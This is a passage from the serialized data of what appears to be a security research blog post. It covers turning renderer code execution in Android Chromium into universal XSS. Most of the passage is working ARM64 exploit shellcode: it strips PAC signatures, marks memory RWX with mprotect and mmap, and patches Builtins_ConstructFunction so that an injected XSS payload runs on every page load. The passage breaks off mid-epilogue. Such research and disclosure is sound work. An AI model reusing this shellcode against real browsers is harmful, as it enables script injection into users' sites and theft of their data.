":6288},[141921,141925,141929,141933,141937,141941,141945,141949,141953],{"type":26,"tag":137,"props":141922,"children":141923},{"style":5573},[141924],{"type":32,"value":38784},{"type":26,"tag":137,"props":141926,"children":141927},{"style":5584},[141928],{"type":32,"value":35567},{"type":26,"tag":137,"props":141930,"children":141931},{"style":5590},[141932],{"type":32,"value":5593},{"type":26,"tag":137,"props":141934,"children":141935},{"style":5584},[141936],{"type":32,"value":138619},{"type":26,"tag":137,"props":141938,"children":141939},{"style":5601},[141940],{"type":32,"value":470},{"type":26,"tag":137,"props":141942,"children":141943},{"style":5584},[141944],{"type":32,"value":40482},{"type":26,"tag":137,"props":141946,"children":141947},{"style":5601},[141948],{"type":32,"value":470},{"type":26,"tag":137,"props":141950,"children":141951},{"style":5584},[141952],{"type":32,"value":136489},{"type":26,"tag":137,"props":141954,"children":141955},{"style":5601},[141956],{"type":32,"value":5604},{"type":26,"tag":137,"props":141958,"children":141959},{"class":5559,"line":6355},[141960,141964,141968,141972,141976,141980],{"type":26,"tag":137,"props":141961,"children":141962},{"style":5584},[141963],{"type":32,"value":104525},{"type":26,"tag":137,"props":141965,"children":141966},{"style":5601},[141967],{"type":32,"value":470},{"type":26,"tag":137,"props":141969,"children":141970},{"style":5682},[141971],{"type":32,"value":104534},{"type":26,"tag":137,"props":141973,"children":141974},{"style":5601},[141975],{"type":32,"value":165},{"type":26,"tag":137,"props":141977,"children":141978},{"style":5584},[141979],{"type":32,"value":1042},{"type":26,"tag":137,"props":141981,"children":141982},{"style":5601},[141983],{"type":32,"value":6430},{"type":26,"tag":137,"props":141985,"children":141986},{"class":5559,"line":6363},[141987],{"type":26,"tag":137,"props":141988,"children":141989},{"style":5601},[141990],{"type":32,"value":104566},{"type":26,"tag":35,"props":141992,"children":141993},{},[141994],{"type":32,"value":141995},"And this time, it works as expected:",{"type":26,"tag":35,"props":141997,"children":141998},{},[141999],{"type":26,"tag":2210,"props":142000,"children":142003},{"alt":142001,"src":142002},"image3","/posts/mobile-renderer-rce/image3.png",[],{"type":26,"tag":118,"props":142005,"children":142007},{"id":142006},"achieving-universal-xss",[142008],{"type":32,"value":142009},"Achieving Universal XSS",{"type":26,"tag":35,"props":142011,"children":142012},{},[142013,142015,142021,142023,142030],{"type":32,"value":142014},"At this point, we have arbitrary shellcode execution in the renderer process. While usually the exploit stops here and further access would require a browser sandbox escape, we decided to explore an alternative route known as UXSS, inspired by this ",{"type":26,"tag":41,"props":142016,"children":142019},{"href":142017,"rel":142018},"https://i.blackhat.com/Asia-24/Presentations/Asia-24-Liu-The-Hole-in-Sandbox.pdf",[45],[142020],{"type":32,"value":72933},{"type":32,"value":142022}," from Tencent Security and ",{"type":26,"tag":41,"props":142024,"children":142027},{"href":142025,"rel":142026},"https://www.interruptlabs.co.uk/articles/one-click-memory-corruption-in-alibabas-uc-browser-exploiting-patch-gap-v8-vulnerabilities-to-steal-your-data",[45],[142028],{"type":32,"value":142029},"research article",{"type":32,"value":142031}," from InterruptLabs.",{"type":26,"tag":35,"props":142033,"children":142034},{},[142035,142037,142044],{"type":32,"value":142036},"Unlike a normal XSS, a UXSS, or universal XSS, is a client side browser exploit that enables arbitrary JavaScript injection in all pages of a website. Normally, site isolation on desktop Chromium prevents this, as each site ends up in a different renderer process, but Android specifically has a ",{"type":26,"tag":41,"props":142038,"children":142041},{"href":142039,"rel":142040},"https://www.chromium.org/Home/chromium-security/site-isolation/#android",[45],[142042],{"type":32,"value":142043},"weaker version",{"type":32,"value":142045}," of this mitigation - only sites with logins and COOP headers are per process isolated. This means that the majority of webpages are in the same renderer process, so any patches to the interpreter will affect them all and lead to UXSS. This is still quite the capability!",{"type":26,"tag":35,"props":142047,"children":142048},{},[142049,142051,142057],{"type":32,"value":142050},"To achieve UXSS, we need to patch a function that’s invoked during site loading so we can run our XSS payload. During debugging, we observed that every site we visited eventually called ",{"type":26,"tag":130,"props":142052,"children":142054},{"className":142053},[],[142055],{"type":32,"value":142056},"Builtins_ConstructFunction",{"type":32,"value":142058},", making it a natural target.",{"type":26,"tag":35,"props":142060,"children":142061},{},[142062,142064,142069],{"type":32,"value":142063},"Our goal is for ",{"type":26,"tag":130,"props":142065,"children":142067},{"className":142066},[],[142068],{"type":32,"value":142056},{"type":32,"value":142070}," to execute our XSS payload first, then continue its normal behavior. To do this, we hook it as follows:",{"type":26,"tag":3426,"props":142072,"children":142073},{},[142074,142079,142089],{"type":26,"tag":3430,"props":142075,"children":142076},{},[142077],{"type":32,"value":142078},"The exploit’s shellcode patches the first few instructions to redirect execution to our mmap-ed shellcode, which runs the XSS payload",{"type":26,"tag":3430,"props":142080,"children":142081},{},[142082,142084],{"type":32,"value":142083},"After finishing, the mmap-ed shellcode restores the original instructions in ",{"type":26,"tag":130,"props":142085,"children":142087},{"className":142086},[],[142088],{"type":32,"value":142056},{"type":26,"tag":3430,"props":142090,"children":142091},{},[142092,142094,142099],{"type":32,"value":142093},"The mmap-ed shellcode then returns to the beginning of ",{"type":26,"tag":130,"props":142095,"children":142097},{"className":142096},[],[142098],{"type":32,"value":142056},{"type":32,"value":142100},", which now proceeds normally",{"type":26,"tag":35,"props":142102,"children":142103},{},[142104],{"type":32,"value":142105},"The ARM64 shellcode implementing this looks as follows:",{"type":26,"tag":5512,"props":142107,"children":142111},{"code":142108,"language":142109,"meta":7,"className":142110,"style":7},"// get return addr to x0\nldr x0, [sp, #0x18]\n// strip pac signature from return address\n.arch armv8.3-a; xpaci x0\n\n// store x5 = Builtins_ConstructFunction\nmovz x1, #0x610c\nsub x0, x0, x1\nmov x5, x0\n\n// store x4 = page aligned ConstructFunction\nmovz x1, #0xf000\nmovk x1, #0xffff, lsl #16\nmovk x1, #0xffff, lsl #32\nand x4, x5, x1\n\n// mprotect page aligned ConstructFunction RWX\nmov x0, x4\nmov x1, #0x2000\nmov x2, #0x7\nmov x8, #226\nsvc #0\n\nmov x6, x5\n\n// mmap RWX for jump dest (uxss_sc)\nmov x0, #0\nmov x1, #0x1000\nmov x2, #0x7\nmov x3, #34\nmov x4, #-1\nmov x5, #0\nmov x8, #222\nsvc #0\n\nmov x5, x0\n\n// at this point:\n// x6 = Builtins_ConstructFunction\n// x5 = mmap page for uxss_sc\n\n// write uxss_sc to mmaped rwx page\n{write_sc(uxss_sc, \"x5\")}\n\n// wipe from cache\nmov x0, x5\n{WIPE_CACHE}\n\n// patch Builtins_ConstructFunction\n{write_sc(new_compile_instrs, \"x6\")}\n// and add a pointer to uxss_sc just above new instructions\nstr x5, [x6, #{5 * INSTR_SIZE}]\n\n// wipe from cache\nmov x0, x6\n{WIPE_CACHE}\n","asm","language-asm shiki shiki-themes slack-dark",[142112],{"type":26,"tag":130,"props":142113,"children":142114},{"__ignoreMap":7},[142115,142123,142131,142139,142147,142154,142162,142170,142178,142186,142193,142201,142209,142217,142225,142233,142240,142248,142256,142264,142272,142280,142288,142295,142303,142310,142318,142326,142334,142341,142349,142357,142365,142373,142380,142387,142394,142401,142409,142417,142425,142432,142440,142448,142455,142463,142471,142479,142486,142494,142502,142510,142518,142525,142532,142540],{"type":26,"tag":137,"props":142116,"children":142117},{"class":5559,"line":5560},[142118],{"type":26,"tag":137,"props":142119,"children":142120},{},[142121],{"type":32,"value":142122},"// get return addr to x0\n",{"type":26,"tag":137,"props":142124,"children":142125},{"class":5559,"line":5412},[142126],{"type":26,"tag":137,"props":142127,"children":142128},{},[142129],{"type":32,"value":142130},"ldr x0, [sp, #0x18]\n",{"type":26,"tag":137,"props":142132,"children":142133},{"class":5559,"line":5417},[142134],{"type":26,"tag":137,"props":142135,"children":142136},{},[142137],{"type":32,"value":142138},"// strip pac signature from return address\n",{"type":26,"tag":137,"props":142140,"children":142141},{"class":5559,"line":5642},[142142],{"type":26,"tag":137,"props":142143,"children":142144},{},[142145],{"type":32,"value":142146},".arch armv8.3-a; xpaci x0\n",{"type":26,"tag":137,"props":142148,"children":142149},{"class":5559,"line":5745},[142150],{"type":26,"tag":137,"props":142151,"children":142152},{"emptyLinePlaceholder":18},[142153],{"type":32,"value":6276},{"type":26,"tag":137,"props":142155,"children":142156},{"class":5559,"line":5850},[142157],{"type":26,"tag":137,"props":142158,"children":142159},{},[142160],{"type":32,"value":142161},"// store x5 = Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":142163,"children":142164},{"class":5559,"line":5878},[142165],{"type":26,"tag":137,"props":142166,"children":142167},{},[142168],{"type":32,"value":142169},"movz x1, #0x610c\n",{"type":26,"tag":137,"props":142171,"children":142172},{"class":5559,"line":5891},[142173],{"type":26,"tag":137,"props":142174,"children":142175},{},[142176],{"type":32,"value":142177},"sub x0, x0, x1\n",{"type":26,"tag":137,"props":142179,"children":142180},{"class":5559,"line":5909},[142181],{"type":26,"tag":137,"props":142182,"children":142183},{},[142184],{"type":32,"value":142185},"mov x5, x0\n",{"type":26,"tag":137,"props":142187,"children":142188},{"class":5559,"line":5930},[142189],{"type":26,"tag":137,"props":142190,"children":142191},{"emptyLinePlaceholder":18},[142192],{"type":32,"value":6276},{"type":26,"tag":137,"props":142194,"children":142195},{"class":5559,"line":5939},[142196],{"type":26,"tag":137,"props":142197,"children":142198},{},[142199],{"type":32,"value":142200},"// store x4 = page aligned ConstructFunction\n",{"type":26,"tag":137,"props":142202,"children":142203},{"class":5559,"line":6191},[142204],{"type":26,"tag":137,"props":142205,"children":142206},{},[142207],{"type":32,"value":142208},"movz x1, #0xf000\n",{"type":26,"tag":137,"props":142210,"children":142211},{"class":5559,"line":6208},[142212],{"type":26,"tag":137,"props":142213,"children":142214},{},[142215],{"type":32,"value":142216},"movk x1, #0xffff, lsl #16\n",{"type":26,"tag":137,"props":142218,"children":142219},{"class":5559,"line":6225},[142220],{"type":26,"tag":137,"props":142221,"children":142222},{},[142223],{"type":32,"value":142224},"movk x1, #0xffff, lsl #32\n",{"type":26,"tag":137,"props":142226,"children":142227},{"class":5559,"line":6238},[142228],{"type":26,"tag":137,"props":142229,"children":142230},{},[142231],{"type":32,"value":142232},"and x4, x5, x1\n",{"type":26,"tag":137,"props":142234,"children":142235},{"class":5559,"line":6247},[142236],{"type":26,"tag":137,"props":142237,"children":142238},{"emptyLinePlaceholder":18},[142239],{"type":32,"value":6276},{"type":26,"tag":137,"props":142241,"children":142242},{"class":5559,"line":6270},[142243],{"type":26,"tag":137,"props":142244,"children":142245},{},[142246],{"type":32,"value":142247},"// mprotect page aligned ConstructFunction RWX\n",{"type":26,"tag":137,"props":142249,"children":142250},{"class":5559,"line":6279},[142251],{"type":26,"tag":137,"props":142252,"children":142253},{},[142254],{"type":32,"value":142255},"mov x0, x4\n",{"type":26,"tag":137,"props":142257,"children":142258},{"class":5559,"line":6288},[142259],{"type":26,"tag":137,"props":142260,"children":142261},{},[142262],{"type":32,"value":142263},"mov x1, #0x2000\n",{"type":26,"tag":137,"props":142265,"children":142266},{"class":5559,"line":6355},[142267],{"type":26,"tag":137,"props":142268,"children":142269},{},[142270],{"type":32,"value":142271},"mov x2, #0x7\n",{"type":26,"tag":137,"props":142273,"children":142274},{"class":5559,"line":6363},[142275],{"type":26,"tag":137,"props":142276,"children":142277},{},[142278],{"type":32,"value":142279},"mov x8, #226\n",{"type":26,"tag":137,"props":142281,"children":142282},{"class":5559,"line":6393},[142283],{"type":26,"tag":137,"props":142284,"children":142285},{},[142286],{"type":32,"value":142287},"svc #0\n",{"type":26,"tag":137,"props":142289,"children":142290},{"class":5559,"line":6401},[142291],{"type":26,"tag":137,"props":142292,"children":142293},{"emptyLinePlaceholder":18},[142294],{"type":32,"value":6276},{"type":26,"tag":137,"props":142296,"children":142297},{"class":5559,"line":6433},[142298],{"type":26,"tag":137,"props":142299,"children":142300},{},[142301],{"type":32,"value":142302},"mov x6, x5\n",{"type":26,"tag":137,"props":142304,"children":142305},{"class":5559,"line":6441},[142306],{"type":26,"tag":137,"props":142307,"children":142308},{"emptyLinePlaceholder":18},[142309],{"type":32,"value":6276},{"type":26,"tag":137,"props":142311,"children":142312},{"class":5559,"line":6501},[142313],{"type":26,"tag":137,"props":142314,"children":142315},{},[142316],{"type":32,"value":142317},"// mmap RWX for jump dest (uxss_sc)\n",{"type":26,"tag":137,"props":142319,"children":142320},{"class":5559,"line":11634},[142321],{"type":26,"tag":137,"props":142322,"children":142323},{},[142324],{"type":32,"value":142325},"mov x0, #0\n",{"type":26,"tag":137,"props":142327,"children":142328},{"class":5559,"line":11652},[142329],{"type":26,"tag":137,"props":142330,"children":142331},{},[142332],{"type":32,"value":142333},"mov x1, #0x1000\n",{"type":26,"tag":137,"props":142335,"children":142336},{"class":5559,"line":11697},[142337],{"type":26,"tag":137,"props":142338,"children":142339},{},[142340],{"type":32,"value":142271},{"type":26,"tag":137,"props":142342,"children":142343},{"class":5559,"line":11803},[142344],{"type":26,"tag":137,"props":142345,"children":142346},{},[142347],{"type":32,"value":142348},"mov x3, #34\n",{"type":26,"tag":137,"props":142350,"children":142351},{"class":5559,"line":26089},[142352],{"type":26,"tag":137,"props":142353,"children":142354},{},[142355],{"type":32,"value":142356},"mov x4, #-1\n",{"type":26,"tag":137,"props":142358,"children":142359},{"class":5559,"line":26124},[142360],{"type":26,"tag":137,"props":142361,"children":142362},{},[142363],{"type":32,"value":142364},"mov x5, #0\n",{"type":26,"tag":137,"props":142366,"children":142367},{"class":5559,"line":26132},[142368],{"type":26,"tag":137,"props":142369,"children":142370},{},[142371],{"type":32,"value":142372},"mov x8, #222\n",{"type":26,"tag":137,"props":142374,"children":142375},{"class":5559,"line":26140},[142376],{"type":26,"tag":137,"props":142377,"children":142378},{},[142379],{"type":32,"value":142287},{"type":26,"tag":137,"props":142381,"children":142382},{"class":5559,"line":26149},[142383],{"type":26,"tag":137,"props":142384,"children":142385},{"emptyLinePlaceholder":18},[142386],{"type":32,"value":6276},{"type":26,"tag":137,"props":142388,"children":142389},{"class":5559,"line":26191},[142390],{"type":26,"tag":137,"props":142391,"children":142392},{},[142393],{"type":32,"value":142185},{"type":26,"tag":137,"props":142395,"children":142396},{"class":5559,"line":26224},[142397],{"type":26,"tag":137,"props":142398,"children":142399},{"emptyLinePlaceholder":18},[142400],{"type":32,"value":6276},{"type":26,"tag":137,"props":142402,"children":142403},{"class":5559,"line":26232},[142404],{"type":26,"tag":137,"props":142405,"children":142406},{},[142407],{"type":32,"value":142408},"// at this point:\n",{"type":26,"tag":137,"props":142410,"children":142411},{"class":5559,"line":26240},[142412],{"type":26,"tag":137,"props":142413,"children":142414},{},[142415],{"type":32,"value":142416},"// x6 = Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":142418,"children":142419},{"class":5559,"line":26249},[142420],{"type":26,"tag":137,"props":142421,"children":142422},{},[142423],{"type":32,"value":142424},"// x5 = mmap page for uxss_sc\n",{"type":26,"tag":137,"props":142426,"children":142427},{"class":5559,"line":26325},[142428],{"type":26,"tag":137,"props":142429,"children":142430},{"emptyLinePlaceholder":18},[142431],{"type":32,"value":6276},{"type":26,"tag":137,"props":142433,"children":142434},{"class":5559,"line":26358},[142435],{"type":26,"tag":137,"props":142436,"children":142437},{},[142438],{"type":32,"value":142439},"// write uxss_sc to mmaped rwx page\n",{"type":26,"tag":137,"props":142441,"children":142442},{"class":5559,"line":26366},[142443],{"type":26,"tag":137,"props":142444,"children":142445},{},[142446],{"type":32,"value":142447},"{write_sc(uxss_sc, \"x5\")}\n",{"type":26,"tag":137,"props":142449,"children":142450},{"class":5559,"line":26374},[142451],{"type":26,"tag":137,"props":142452,"children":142453},{"emptyLinePlaceholder":18},[142454],{"type":32,"value":6276},{"type":26,"tag":137,"props":142456,"children":142457},{"class":5559,"line":26411},[142458],{"type":26,"tag":137,"props":142459,"children":142460},{},[142461],{"type":32,"value":142462},"// wipe from cache\n",{"type":26,"tag":137,"props":142464,"children":142465},{"class":5559,"line":26424},[142466],{"type":26,"tag":137,"props":142467,"children":142468},{},[142469],{"type":32,"value":142470},"mov x0, x5\n",{"type":26,"tag":137,"props":142472,"children":142473},{"class":5559,"line":26437},[142474],{"type":26,"tag":137,"props":142475,"children":142476},{},[142477],{"type":32,"value":142478},"{WIPE_CACHE}\n",{"type":26,"tag":137,"props":142480,"children":142481},{"class":5559,"line":26450},[142482],{"type":26,"tag":137,"props":142483,"children":142484},{"emptyLinePlaceholder":18},[142485],{"type":32,"value":6276},{"type":26,"tag":137,"props":142487,"children":142488},{"class":5559,"line":26504},[142489],{"type":26,"tag":137,"props":142490,"children":142491},{},[142492],{"type":32,"value":142493},"// patch Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":142495,"children":142496},{"class":5559,"line":26513},[142497],{"type":26,"tag":137,"props":142498,"children":142499},{},[142500],{"type":32,"value":142501},"{write_sc(new_compile_instrs, \"x6\")}\n",{"type":26,"tag":137,"props":142503,"children":142504},{"class":5559,"line":34876},[142505],{"type":26,"tag":137,"props":142506,"children":142507},{},[142508],{"type":32,"value":142509},"// and add a pointer to uxss_sc just above new instructions\n",{"type":26,"tag":137,"props":142511,"children":142512},{"class":5559,"line":34897},[142513],{"type":26,"tag":137,"props":142514,"children":142515},{},[142516],{"type":32,"value":142517},"str x5, [x6, #{5 * INSTR_SIZE}]\n",{"type":26,"tag":137,"props":142519,"children":142520},{"class":5559,"line":83553},[142521],{"type":26,"tag":137,"props":142522,"children":142523},{"emptyLinePlaceholder":18},[142524],{"type":32,"value":6276},{"type":26,"tag":137,"props":142526,"children":142527},{"class":5559,"line":83566},[142528],{"type":26,"tag":137,"props":142529,"children":142530},{},[142531],{"type":32,"value":142462},{"type":26,"tag":137,"props":142533,"children":142534},{"class":5559,"line":83574},[142535],{"type":26,"tag":137,"props":142536,"children":142537},{},[142538],{"type":32,"value":142539},"mov x0, x6\n",{"type":26,"tag":137,"props":142541,"children":142542},{"class":5559,"line":83582},[142543],{"type":26,"tag":137,"props":142544,"children":142545},{},[142546],{"type":32,"value":142478},{"type":26,"tag":35,"props":142548,"children":142549},{},[142550,142552,142558,142560,142565,142567,142573],{"type":32,"value":142551},"In the snippet above, ",{"type":26,"tag":130,"props":142553,"children":142555},{"className":142554},[],[142556],{"type":32,"value":142557},"new_compile_instrs",{"type":32,"value":142559}," refers to the instructions written to the beginning of ",{"type":26,"tag":130,"props":142561,"children":142563},{"className":142562},[],[142564],{"type":32,"value":142056},{"type":32,"value":142566}," that invoke the ",{"type":26,"tag":130,"props":142568,"children":142570},{"className":142569},[],[142571],{"type":32,"value":142572},"uxss_sc",{"type":32,"value":142574}," mmap-ed shellcode:",{"type":26,"tag":5512,"props":142576,"children":142578},{"code":142577,"language":142109,"meta":7,"className":142110,"style":7},"bti c\n\n// store registers that will be overwritten\nstp x15, lr, [sp, #-16]!\n\n// get current rip into x15\nadr x15, .\n\n// load the uxss_sc pointer saved just above new instructions\nldr x15, [x15, #{3 * INSTR_SIZE}]\n\n// jump to uxss_sc\nblr x15\n",[142579],{"type":26,"tag":130,"props":142580,"children":142581},{"__ignoreMap":7},[142582,142590,142597,142605,142613,142620,142628,142636,142643,142651,142659,142666,142674],{"type":26,"tag":137,"props":142583,"children":142584},{"class":5559,"line":5560},[142585],{"type":26,"tag":137,"props":142586,"children":142587},{},[142588],{"type":32,"value":142589},"bti c\n",{"type":26,"tag":137,"props":142591,"children":142592},{"class":5559,"line":5412},[142593],{"type":26,"tag":137,"props":142594,"children":142595},{"emptyLinePlaceholder":18},[142596],{"type":32,"value":6276},{"type":26,"tag":137,"props":142598,"children":142599},{"class":5559,"line":5417},[142600],{"type":26,"tag":137,"props":142601,"children":142602},{},[142603],{"type":32,"value":142604},"// store registers that will be overwritten\n",{"type":26,"tag":137,"props":142606,"children":142607},{"class":5559,"line":5642},[142608],{"type":26,"tag":137,"props":142609,"children":142610},{},[142611],{"type":32,"value":142612},"stp x15, lr, [sp, #-16]!\n",{"type":26,"tag":137,"props":142614,"children":142615},{"class":5559,"line":5745},[142616],{"type":26,"tag":137,"props":142617,"children":142618},{"emptyLinePlaceholder":18},[142619],{"type":32,"value":6276},{"type":26,"tag":137,"props":142621,"children":142622},{"class":5559,"line":5850},[142623],{"type":26,"tag":137,"props":142624,"children":142625},{},[142626],{"type":32,"value":142627},"// get current rip into x15\n",{"type":26,"tag":137,"props":142629,"children":142630},{"class":5559,"line":5878},[142631],{"type":26,"tag":137,"props":142632,"children":142633},{},[142634],{"type":32,"value":142635},"adr x15, .\n",{"type":26,"tag":137,"props":142637,"children":142638},{"class":5559,"line":5891},[142639],{"type":26,"tag":137,"props":142640,"children":142641},{"emptyLinePlaceholder":18},[142642],{"type":32,"value":6276},{"type":26,"tag":137,"props":142644,"children":142645},{"class":5559,"line":5909},[142646],{"type":26,"tag":137,"props":142647,"children":142648},{},[142649],{"type":32,"value":142650},"// load the uxss_sc pointer saved just above new instructions\n",{"type":26,"tag":137,"props":142652,"children":142653},{"class":5559,"line":5930},[142654],{"type":26,"tag":137,"props":142655,"children":142656},{},[142657],{"type":32,"value":142658},"ldr x15, [x15, #{3 * INSTR_SIZE}]\n",{"type":26,"tag":137,"props":142660,"children":142661},{"class":5559,"line":5939},[142662],{"type":26,"tag":137,"props":142663,"children":142664},{"emptyLinePlaceholder":18},[142665],{"type":32,"value":6276},{"type":26,"tag":137,"props":142667,"children":142668},{"class":5559,"line":6191},[142669],{"type":26,"tag":137,"props":142670,"children":142671},{},[142672],{"type":32,"value":142673},"// jump to uxss_sc\n",{"type":26,"tag":137,"props":142675,"children":142676},{"class":5559,"line":6208},[142677],{"type":26,"tag":137,"props":142678,"children":142679},{},[142680],{"type":32,"value":142681},"blr x15\n",{"type":26,"tag":35,"props":142683,"children":142684},{},[142685,142690,142692,142697],{"type":26,"tag":130,"props":142686,"children":142688},{"className":142687},[],[142689],{"type":32,"value":142572},{"type":32,"value":142691}," is the mmap-ed shellcode invoked by the patched ",{"type":26,"tag":130,"props":142693,"children":142695},{"className":142694},[],[142696],{"type":32,"value":142056},{"type":32,"value":142698}," to execute our XSS payload. Its prologue looks like this:",{"type":26,"tag":5512,"props":142700,"children":142702},{"code":142701,"language":142109,"meta":7,"className":142110,"style":7},"bti c\n\n// Save full register context\nstp x0,  x1,  [sp, #-16]!\nstp x2,  x3,  [sp, #-16]!\nstp x4,  x5,  [sp, #-16]!\nstp x6,  x7,  [sp, #-16]!\nstp x8,  x9,  [sp, #-16]!\nstp x10, x11, [sp, #-16]!\nstp x12, x13, [sp, #-16]!\nstp x14, x15, [sp, #-16]!\nstp x16, x17, [sp, #-16]!\nstp x18, x19, [sp, #-16]!\nstp x20, x21, [sp, #-16]!\nstp x22, x23, [sp, #-16]!\nstp x24, x25, [sp, #-16]!\nstp x26, x27, [sp, #-16]!\nstp x28, x29, [sp, #-16]!\nstr lr, [sp, #-16]!\n",[142703],{"type":26,"tag":130,"props":142704,"children":142705},{"__ignoreMap":7},[142706,142713,142720,142728,142736,142744,142752,142760,142768,142776,142784,142792,142800,142808,142816,142824,142832,142840,142848],{"type":26,"tag":137,"props":142707,"children":142708},{"class":5559,"line":5560},[142709],{"type":26,"tag":137,"props":142710,"children":142711},{},[142712],{"type":32,"value":142589},{"type":26,"tag":137,"props":142714,"children":142715},{"class":5559,"line":5412},[142716],{"type":26,"tag":137,"props":142717,"children":142718},{"emptyLinePlaceholder":18},[142719],{"type":32,"value":6276},{"type":26,"tag":137,"props":142721,"children":142722},{"class":5559,"line":5417},[142723],{"type":26,"tag":137,"props":142724,"children":142725},{},[142726],{"type":32,"value":142727},"// Save full register context\n",{"type":26,"tag":137,"props":142729,"children":142730},{"class":5559,"line":5642},[142731],{"type":26,"tag":137,"props":142732,"children":142733},{},[142734],{"type":32,"value":142735},"stp x0,  x1,  [sp, #-16]!\n",{"type":26,"tag":137,"props":142737,"children":142738},{"class":5559,"line":5745},[142739],{"type":26,"tag":137,"props":142740,"children":142741},{},[142742],{"type":32,"value":142743},"stp x2,  x3,  [sp, #-16]!\n",{"type":26,"tag":137,"props":142745,"children":142746},{"class":5559,"line":5850},[142747],{"type":26,"tag":137,"props":142748,"children":142749},{},[142750],{"type":32,"value":142751},"stp x4,  x5,  [sp, #-16]!\n",{"type":26,"tag":137,"props":142753,"children":142754},{"class":5559,"line":5878},[142755],{"type":26,"tag":137,"props":142756,"children":142757},{},[142758],{"type":32,"value":142759},"stp x6,  x7,  [sp, #-16]!\n",{"type":26,"tag":137,"props":142761,"children":142762},{"class":5559,"line":5891},[142763],{"type":26,"tag":137,"props":142764,"children":142765},{},[142766],{"type":32,"value":142767},"stp x8,  x9,  [sp, #-16]!\n",{"type":26,"tag":137,"props":142769,"children":142770},{"class":5559,"line":5909},[142771],{"type":26,"tag":137,"props":142772,"children":142773},{},[142774],{"type":32,"value":142775},"stp x10, x11, [sp, #-16]!\n",{"type":26,"tag":137,"props":142777,"children":142778},{"class":5559,"line":5930},[142779],{"type":26,"tag":137,"props":142780,"children":142781},{},[142782],{"type":32,"value":142783},"stp x12, x13, [sp, #-16]!\n",{"type":26,"tag":137,"props":142785,"children":142786},{"class":5559,"line":5939},[142787],{"type":26,"tag":137,"props":142788,"children":142789},{},[142790],{"type":32,"value":142791},"stp x14, x15, [sp, #-16]!\n",{"type":26,"tag":137,"props":142793,"children":142794},{"class":5559,"line":6191},[142795],{"type":26,"tag":137,"props":142796,"children":142797},{},[142798],{"type":32,"value":142799},"stp x16, x17, [sp, #-16]!\n",{"type":26,"tag":137,"props":142801,"children":142802},{"class":5559,"line":6208},[142803],{"type":26,"tag":137,"props":142804,"children":142805},{},[142806],{"type":32,"value":142807},"stp x18, x19, [sp, #-16]!\n",{"type":26,"tag":137,"props":142809,"children":142810},{"class":5559,"line":6225},[142811],{"type":26,"tag":137,"props":142812,"children":142813},{},[142814],{"type":32,"value":142815},"stp x20, x21, [sp, #-16]!\n",{"type":26,"tag":137,"props":142817,"children":142818},{"class":5559,"line":6238},[142819],{"type":26,"tag":137,"props":142820,"children":142821},{},[142822],{"type":32,"value":142823},"stp x22, x23, [sp, #-16]!\n",{"type":26,"tag":137,"props":142825,"children":142826},{"class":5559,"line":6247},[142827],{"type":26,"tag":137,"props":142828,"children":142829},{},[142830],{"type":32,"value":142831},"stp x24, x25, [sp, #-16]!\n",{"type":26,"tag":137,"props":142833,"children":142834},{"class":5559,"line":6270},[142835],{"type":26,"tag":137,"props":142836,"children":142837},{},[142838],{"type":32,"value":142839},"stp x26, x27, [sp, #-16]!\n",{"type":26,"tag":137,"props":142841,"children":142842},{"class":5559,"line":6279},[142843],{"type":26,"tag":137,"props":142844,"children":142845},{},[142846],{"type":32,"value":142847},"stp x28, x29, [sp, #-16]!\n",{"type":26,"tag":137,"props":142849,"children":142850},{"class":5559,"line":6288},[142851],{"type":26,"tag":137,"props":142852,"children":142853},{},[142854],{"type":32,"value":142855},"str lr, [sp, #-16]!\n",{"type":26,"tag":35,"props":142857,"children":142858},{},[142859],{"type":32,"value":142860},"All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.",{"type":26,"tag":35,"props":142862,"children":142863},{},[142864,142866,142871],{"type":32,"value":142865},"The epilogue restores all saved registers, restores the original instructions in ",{"type":26,"tag":130,"props":142867,"children":142869},{"className":142868},[],[142870],{"type":32,"value":142056},{"type":32,"value":142872},", and then returns execution to its beginning:",{"type":26,"tag":5512,"props":142874,"children":142876},{"code":142875,"language":142109,"meta":7,"className":142110,"style":7},"// restore original instructions of Builtins_ConstructFunction\nldr lr, [sp], #16\n// move lr to the beginning of Builtins_ConstructFunction\nsub lr, lr, #{5 * INSTR_SIZE}\n{write_sc(orig_compile_instrs, \"lr\")}\n\n// wipe from cache\nmov x0, lr\n{WIPE_CACHE}\n\n// restore original registers\nldp x28, x29, [sp], #16\nldp x26, x27, [sp], #16\nldp x24, x25, [sp], #16\nldp x22, x23, [sp], #16\nldp x20, x21, [sp], #16\nldp x18, x19, [sp], #16\nldp x16, x17, [sp], #16\nldp x14, x15, [sp], #16\nldp x12, x13, [sp], #16\nldp x10, x11, [sp], #16\nldp x8,  x9,  [sp], #16\nldp x6,  x7,  [sp], #16\nldp x4,  x5,  [sp], #16\nldp x2,  x3,  [sp], #16\nldp x0,  x1,  [sp], #16\n\n// Builtins_ConstructFunction doesnt care about x4 and overwrites\n// it immediately, so we can clobber and use it as a return register.\n// This is done so lr isnt clobbered and ConstructFunction knows\n// where to return\nmov x4, lr\n\n// x15 and lr were saved in patched Builtins_ConstructFunction\nldp x15, lr, [sp], #16\n\nret x4\n",[142877],{"type":26,"tag":130,"props":142878,"children":142879},{"__ignoreMap":7},[142880,142888,142896,142904,142912,142920,142927,142934,142942,142949,142956,142964,142972,142980,142988,142996,143004,143012,143020,143028,143036,143044,143052,143060,143068,143076,143084,143091,143099,143107,143115,143123,143131,143138,143146,143154,143161],{"type":26,"tag":137,"props":142881,"children":142882},{"class":5559,"line":5560},[142883],{"type":26,"tag":137,"props":142884,"children":142885},{},[142886],{"type":32,"value":142887},"// restore original instructions of Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":142889,"children":142890},{"class":5559,"line":5412},[142891],{"type":26,"tag":137,"props":142892,"children":142893},{},[142894],{"type":32,"value":142895},"ldr lr, [sp], #16\n",{"type":26,"tag":137,"props":142897,"children":142898},{"class":5559,"line":5417},[142899],{"type":26,"tag":137,"props":142900,"children":142901},{},[142902],{"type":32,"value":142903},"// move lr to the beginning of Builtins_ConstructFunction\n",{"type":26,"tag":137,"props":142905,"children":142906},{"class":5559,"line":5642},[142907],{"type":26,"tag":137,"props":142908,"children":142909},{},[142910],{"type":32,"value":142911},"sub lr, lr, #{5 * 